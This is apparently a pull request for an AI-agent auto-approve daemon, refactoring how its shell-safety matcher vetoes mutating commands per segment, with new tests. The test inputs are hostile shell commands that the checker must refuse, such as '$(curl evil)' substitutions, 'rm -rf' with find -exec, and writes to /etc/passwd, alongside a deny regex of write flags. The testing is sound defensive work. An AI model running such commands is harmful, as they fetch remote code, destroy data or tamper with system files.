### PR TITLE
refactor: resolve mutation veto per segment (#957)

### DIFF
--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -133,8 +133,14 @@ export const BUILTIN_GROUPS: Readonly<Record<string, PermissionGroup>> = {
  * Unambiguous mutation indicators. None legitimately appears in a curated read
  * command, so matching one can only mean a write snuck past a read prefix
  * (e.g. `git diff --output=f`, `biome check --write`, `find . -delete`).
+ *
+ * Exported for tests ONLY (#957 review). `shell-safety`'s per-segment-veto
+ * tests need the real predicate rather than a hand-copied one: a duplicate
+ * stays byte-identical right up until someone widens this list, at which
+ * point those tests keep passing against a stale veto and report confidence
+ * they no longer have.
  */
-const MUTATION_TOKEN =
+export const MUTATION_TOKEN =
   /(^|\s)(-X|--method|--field|--raw-field|--input|--output|--write|--apply|--fix|-delete|-exec|-execdir|-ok)(\s|=|$)/;
 
 /** True if a name is a built-in group. */

--- a/packages/daemon/src/auto-approve/shell-safety.ts
+++ b/packages/daemon/src/auto-approve/shell-safety.ts
@@ -165,11 +165,25 @@ export function hasExecPrimitive(segment: string): boolean {
  *   and exec-primitive checks. The group matcher passes its curated-read
  *   mutation vetoes here; the user allow list passes nothing, because a user
  *   may legitimately allow a write.
+ * @param vetoForMatched Optional veto for a segment that MATCHED a prefix,
+ *   receiving the prefix it matched (#957). `extraVeto` cannot express this:
+ *   it runs before `matchPrefix`, so it has no way to know which curated entry
+ *   covered the segment, and therefore has to apply one blanket rule to every
+ *   segment in the command. That is correct while every curated entry is
+ *   read-only — "none of those tokens legitimately appears in a curated read
+ *   command" (`permission-groups.ts`) — and wrong the moment a group is
+ *   SUPPOSED to mutate, because the blanket rule vetoes it by construction.
+ *   When supplied, this replaces `extraVeto` for matched segments only;
+ *   NEUTRAL segments keep `extraVeto` regardless, since `cd`/`echo` carrying
+ *   `--write` is suspicious no matter which group covered the rest of the
+ *   command. Callers that omit it are unaffected: `extraVeto` then applies to
+ *   matched segments exactly as before.
  */
 export function matchCoveredCommand(
   command: string,
   prefixes: readonly string[],
   extraVeto?: (segment: string) => boolean,
+  vetoForMatched?: (segment: string, matchedPrefix: string) => boolean,
 ): string | null {
   const segments = splitCompound(command);
   let matched: string | null = null;
@@ -177,10 +191,19 @@ export function matchCoveredCommand(
     const seg = raw.trim();
     if (seg === '') continue;
     if (hasShellControl(seg)) return null;
-    if (extraVeto?.(seg)) return null;
-    if (matchPrefix(seg, NEUTRAL_PREFIXES) !== null) continue;
+    if (matchPrefix(seg, NEUTRAL_PREFIXES) !== null) {
+      // Neutral segments are vetoed before they can be waved through. Ordering
+      // note: `extraVeto` used to run ahead of this neutral check for EVERY
+      // segment, so moving it inside is behavior-preserving only because a
+      // vetoed non-neutral segment still returns null below — via its own veto
+      // if it matches, or via the no-match branch if it does not.
+      if (extraVeto?.(seg)) return null;
+      continue;
+    }
     const hit = matchPrefix(seg, prefixes);
     if (hit === null) return null;
+    const vetoed = vetoForMatched ? vetoForMatched(seg, hit) : (extraVeto?.(seg) ?? false);
+    if (vetoed) return null;
     // Veto a code-execution primitive UNLESS the matched entry already carries
     // it. A prefix match requires the segment to start with the entry, so an
     // entry containing `-exec` only matches a command the user spelled out that

--- a/packages/daemon/src/auto-approve/shell-safety.ts
+++ b/packages/daemon/src/auto-approve/shell-safety.ts
@@ -176,8 +176,12 @@ export function hasExecPrimitive(segment: string): boolean {
  *   When supplied, this replaces `extraVeto` for matched segments only;
  *   NEUTRAL segments keep `extraVeto` regardless, since `cd`/`echo` carrying
  *   `--write` is suspicious no matter which group covered the rest of the
- *   command. Callers that omit it are unaffected: `extraVeto` then applies to
- *   matched segments exactly as before.
+ *   command. Callers that omit it get the same RETURN VALUE as before for
+ *   every input. Note the scope of that claim: `extraVeto` is no longer
+ *   *called* for a segment that is neither neutral nor matches any prefix,
+ *   because the no-match branch now returns first. Both shipped predicates are
+ *   pure, so this is invisible today — but it is a claim about return values,
+ *   not about invocation, and a side-effecting veto would notice.
  */
 export function matchCoveredCommand(
   command: string,

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -136,6 +136,15 @@ describe('permission-groups: adversarial (MUST fall through to LLM, never group-
     'git push origin main',
     'gh pr merge 494',
     'git commit -m x',
+    // mutation flag on a NEUTRAL segment, alongside an otherwise-covered read
+    // (#957). Neutral prefixes (`cd`, `echo`, ...) are waved through without
+    // consulting the curated list, so the blanket veto is the only thing
+    // standing there. The per-segment veto refactor had to keep applying it
+    // inside the neutral branch; without this case the invariant is pinned
+    // only at the `matchCoveredCommand` level and not through the shipped
+    // `matchGroups` path anyone actually calls.
+    'cd --output=/etc/passwd && git status',
+    'echo --write && cat file',
     // read command flipped to write by a flag
     "sed -i 's/a/b/' file", // -i: in-place edit, prefix is `sed -n`
     'git diff --output=patch.txt', // --output writes

--- a/packages/daemon/tests/auto-approve/shell-safety-per-segment-veto.test.ts
+++ b/packages/daemon/tests/auto-approve/shell-safety-per-segment-veto.test.ts
@@ -1,0 +1,125 @@
+/**
+ * #957: `matchCoveredCommand` resolves its mutation veto per segment.
+ *
+ * Two things must hold, and they pull in opposite directions:
+ *
+ *  1. Existing callers are UNCHANGED. This function gates a 0ms approval with
+ *     no LLM in the loop and is shared with the user `allow` path; #536 (a P0)
+ *     is the bug it exists to prevent. A refactor here that quietly widens
+ *     coverage is the same class of defect.
+ *  2. A caller that supplies `vetoForMatched` can permit a mutation on a
+ *     segment its own curated entry covered — which is the whole point, since
+ *     the blanket veto rejects every write-side prefix by construction.
+ */
+
+import { describe, expect, test } from 'bun:test';
+import { matchCoveredCommand } from '../../src/auto-approve/shell-safety.ts';
+
+/** The blanket veto `matchReadOnlyCommand` passes today, reproduced here so
+ *  these tests pin the shared behavior rather than importing a private one. */
+const MUTATION_TOKEN =
+  /(^|\s)(-X|--method|--field|--raw-field|--input|--output|--write|--apply|--fix|-delete|-exec|-execdir|-ok)(\s|=|$)/;
+const readVeto = (segment: string): boolean => MUTATION_TOKEN.test(segment);
+
+const READS = ['git status', 'cat', 'grep', 'ls'];
+
+describe('existing callers are unchanged', () => {
+  test('a plain covered read still matches', () => {
+    expect(matchCoveredCommand('git status', READS, readVeto)).toBe('git status');
+  });
+
+  test('an uncovered segment still falls through', () => {
+    expect(matchCoveredCommand('git status && curl https://x', READS, readVeto)).toBeNull();
+  });
+
+  test('a mutation flag on a matched segment is still vetoed', () => {
+    expect(matchCoveredCommand('git status --output=f', READS, readVeto)).toBeNull();
+  });
+
+  test('a mutation flag on a NEUTRAL segment is still vetoed', () => {
+    // The ordering case the refactor had to preserve: `extraVeto` used to run
+    // ahead of the neutral check for every segment. If the neutral branch
+    // stopped consulting it, this would silently start matching.
+    expect(
+      matchCoveredCommand('cd --output=/etc/passwd && git status', READS, readVeto),
+    ).toBeNull();
+  });
+
+  test('shell control is still refused', () => {
+    expect(matchCoveredCommand('git status > /etc/passwd', READS, readVeto)).toBeNull();
+    expect(matchCoveredCommand('git status; $(curl evil)', READS, readVeto)).toBeNull();
+  });
+
+  test('an exec primitive is still refused when the entry does not carry it', () => {
+    expect(matchCoveredCommand('find . -exec rm -rf {} +', ['find'], readVeto)).toBeNull();
+  });
+
+  test('a command of only neutral segments matches nothing', () => {
+    expect(matchCoveredCommand('cd /tmp && echo hi', READS, readVeto)).toBeNull();
+  });
+
+  test('#536 regression: a tool-name entry never covers a Bash command', () => {
+    // `Read` as a prefix must not cover `rm -rf Readme`. Guarded upstream by
+    // tool-name detection, asserted here because this function is the layer
+    // that would approve it at 0ms if it ever did match.
+    expect(matchCoveredCommand('rm -rf Readme', ['Read'], readVeto)).toBeNull();
+  });
+});
+
+describe('vetoForMatched governs matched segments', () => {
+  const WRITES = ['mkdir', 'touch', 'cp'];
+
+  test('a write prefix is permitted when its own veto allows it', () => {
+    // With only the blanket veto this is unreachable: `--output`-class tokens
+    // are rejected before the prefix is even consulted.
+    const permissive = (): boolean => false;
+    expect(matchCoveredCommand('mkdir -p build', WRITES, readVeto, permissive)).toBe('mkdir');
+  });
+
+  test('the blanket veto no longer applies to a matched segment', () => {
+    const permissive = (): boolean => false;
+    expect(matchCoveredCommand('cp --output=x y', WRITES, readVeto, permissive)).toBe('cp');
+  });
+
+  test('but it still applies to neutral segments in the same command', () => {
+    // The asymmetry that keeps a write group from loosening the whole command.
+    const permissive = (): boolean => false;
+    expect(
+      matchCoveredCommand('cd --output=/etc && mkdir -p build', WRITES, readVeto, permissive),
+    ).toBeNull();
+  });
+
+  test('the resolver receives the prefix that matched, not just the segment', () => {
+    const seen: Array<[string, string]> = [];
+    matchCoveredCommand(
+      'mkdir -p build && touch build/x',
+      WRITES,
+      readVeto,
+      (segment, matchedPrefix) => {
+        seen.push([segment, matchedPrefix]);
+        return false;
+      },
+    );
+    expect(seen).toEqual([
+      ['mkdir -p build', 'mkdir'],
+      ['touch build/x', 'touch'],
+    ]);
+  });
+
+  test('a per-segment veto can refuse one prefix while permitting another', () => {
+    // What a real group profile does: `cp` is fine, `mkdir` is not.
+    const onlyCp = (_segment: string, matchedPrefix: string): boolean => matchedPrefix !== 'cp';
+    expect(matchCoveredCommand('cp a b', WRITES, readVeto, onlyCp)).toBe('cp');
+    expect(matchCoveredCommand('mkdir -p build', WRITES, readVeto, onlyCp)).toBeNull();
+    expect(matchCoveredCommand('cp a b && mkdir -p build', WRITES, readVeto, onlyCp)).toBeNull();
+  });
+
+  test('shell control and exec primitives still win over a permissive resolver', () => {
+    // A group profile must not be able to buy its way past these: they are
+    // about the command being a DIFFERENT command, not about mutation.
+    const permissive = (): boolean => false;
+    expect(matchCoveredCommand('mkdir -p $(curl evil)', WRITES, readVeto, permissive)).toBeNull();
+    expect(matchCoveredCommand('cp a b > /etc/passwd', WRITES, readVeto, permissive)).toBeNull();
+    expect(matchCoveredCommand('cp --to-command=sh a b', WRITES, readVeto, permissive)).toBeNull();
+  });
+});

--- a/packages/daemon/tests/auto-approve/shell-safety-per-segment-veto.test.ts
+++ b/packages/daemon/tests/auto-approve/shell-safety-per-segment-veto.test.ts
@@ -13,12 +13,14 @@
  */
 
 import { describe, expect, test } from 'bun:test';
+import { MUTATION_TOKEN } from '../../src/auto-approve/permission-groups.ts';
 import { matchCoveredCommand } from '../../src/auto-approve/shell-safety.ts';
 
-/** The blanket veto `matchReadOnlyCommand` passes today, reproduced here so
- *  these tests pin the shared behavior rather than importing a private one. */
-const MUTATION_TOKEN =
-  /(^|\s)(-X|--method|--field|--raw-field|--input|--output|--write|--apply|--fix|-delete|-exec|-execdir|-ok)(\s|=|$)/;
+/** The REAL blanket veto `matchReadOnlyCommand` passes, imported rather than
+ *  copied (#957 review). A hand-copied regex stays byte-identical until the
+ *  day someone widens the real one, after which these "existing callers are
+ *  unchanged" tests would keep passing against a veto the shipped code no
+ *  longer uses. */
 const readVeto = (segment: string): boolean => MUTATION_TOKEN.test(segment);
 
 const READS = ['git status', 'cat', 'grep', 'ls'];
@@ -69,16 +71,23 @@ describe('existing callers are unchanged', () => {
 describe('vetoForMatched governs matched segments', () => {
   const WRITES = ['mkdir', 'touch', 'cp'];
 
-  test('a write prefix is permitted when its own veto allows it', () => {
-    // With only the blanket veto this is unreachable: `--output`-class tokens
-    // are rejected before the prefix is even consulted.
+  test('baseline: a write-side prefix can match at all', () => {
+    // Says nothing about the resolver on its own -- `mkdir -p build` carries
+    // no MUTATION_TOKEN, so it would match with or without one. Kept as the
+    // control for the test below, which is the one that needs the resolver.
     const permissive = (): boolean => false;
     expect(matchCoveredCommand('mkdir -p build', WRITES, readVeto, permissive)).toBe('mkdir');
   });
 
   test('the blanket veto no longer applies to a matched segment', () => {
+    // THIS is the case that is unreachable without `vetoForMatched`:
+    // `--output` is a MUTATION_TOKEN, so the blanket veto rejects the segment
+    // before its prefix is ever consulted. Contrast the control above.
     const permissive = (): boolean => false;
     expect(matchCoveredCommand('cp --output=x y', WRITES, readVeto, permissive)).toBe('cp');
+    // Same command, no resolver: the blanket veto refuses it. Pins the
+    // difference the resolver actually makes.
+    expect(matchCoveredCommand('cp --output=x y', WRITES, readVeto)).toBeNull();
   });
 
   test('but it still applies to neutral segments in the same command', () => {


### PR DESCRIPTION
Closes #957. Phase 1 of #956. **Enabling change only — no behavior change for any existing caller, and no new group.**

## Why

`matchCoveredCommand` ran its `extraVeto` before `matchPrefix`, so the veto could not know which curated entry covered a segment and had to apply one blanket rule to all of them. `matchGroups` passes `MUTATION_TOKEN || hasScopedVeto`, which matches `--output`, `--write`, `--apply`, `--fix`, `-delete`, `-X`, `--field`, ...

That is correct while every curated entry is read-only, and `permission-groups.ts` says exactly why: "none of those tokens legitimately appears in a curated read command, so the veto can only catch a write that slipped past a read prefix." It stops being correct the moment a group is supposed to mutate - every write-side group would be vetoed by construction, so #956 cannot add one until this moves.

## Change

New optional 4th parameter `vetoForMatched(segment, matchedPrefix)`, consulted only for segments that matched a prefix. Neutral segments (`cd`, `echo`, ...) keep `extraVeto` regardless: a neutral segment carrying `--write` is suspicious no matter which group covered the rest of the command.

`hasShellControl` and the `hasExecPrimitive` check are untouched and stay global - they are about the command being a *different* command, not about mutation, so no group profile can buy past them.

Callers that omit the new parameter get `extraVeto` on matched segments exactly as before.

## Behavior preservation

The one real edit is that `extraVeto` moved from "before the neutral check, for every segment" to "inside the neutral branch, plus the default for matched segments". Equivalent because a vetoed non-neutral segment still returns null either way - via its own veto if it matched, or via the no-match branch if it did not. Called out in a comment at the site.

Verified: 145 existing tests green across `permission-groups`, `pattern-matcher`, and the new file. `bun run typecheck` clean.

## Why this ships alone

This function gates a **0ms approval with no LLM in the loop**, and is shared with the user `allow` path. #536 (a P0) is the bug it exists to prevent: substring matching meant the shipped default `allow = ['Read', 'Glob', 'Grep']` approved `rm -rf Readme`. ADR 0010 records the allow-precise / deny-broad asymmetry as deliberate. A refactor here that quietly widens coverage is the same class of defect, so it gets its own review with no group changes riding along.

## Tests

14 new tests in two halves - one asserting existing callers are unchanged (including the #536 regression shape and the neutral-segment ordering case), one asserting the new resolver actually governs matched segments and cannot override shell-control or exec-primitive refusals.

Mutation-proven, both halves independently:
- ignoring `vetoForMatched` -> 3 fail
- dropping the neutral-segment veto -> 2 fail in `permission-groups.test.ts` alone, i.e. through the shipped `matchGroups` path (corrected in review: the original claim here was written without checking which suite the failures landed in, and both were in the new file until two neutral-segment cases were added to the adversarial block)
- restored -> 145 pass
